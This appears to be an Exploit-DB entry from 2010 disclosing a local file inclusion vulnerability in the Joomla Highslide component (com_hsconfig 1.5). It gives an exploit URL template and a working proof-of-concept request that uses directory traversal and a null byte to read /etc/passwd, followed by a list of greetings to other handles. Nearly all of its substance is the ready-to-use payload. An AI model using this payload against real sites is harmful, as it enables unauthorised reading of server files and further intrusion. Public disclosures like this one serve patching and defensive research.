Joomla! Component Highslide 1.5 - Local File Inclusion

EDB-ID:

12086


Platform:

PHP

Published:

2010-04-06

===============================================================================================================


  [o] Joomla Component Highslide JS Local File Inclusion Vulnerability
 
       Software : com_hsconfig version 1.5
       Vendor   : http://www.joomlanook.com/
       Author   : AntiSecurity [ s4va NoGe Vrs-hCk OoN_BoY Paman zxvf ]
       Contact  : public[dot]antisecurity[dot]org
       Home     : http://antisecurity.org/


===============================================================================================================


  [o] Exploit

       http://localhost/[path]/index.php?option=com_hsconfig&controller=[LFI]


  [o] PoC

       http://localhost/index.php?option=com_hsconfig&controller=../../../../../../../../../../etc/passwd%00


===============================================================================================================


  [o] Greetz

       Angela Zhang stardustmemory aJe martfella pizzyroot Genex
       H312Y yooogy mousekill }^-^{ noname matthews wishnusakti
       skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke


===============================================================================================================


  [o] April 06 2010 - GMT +07:00 Jakarta, Indonesia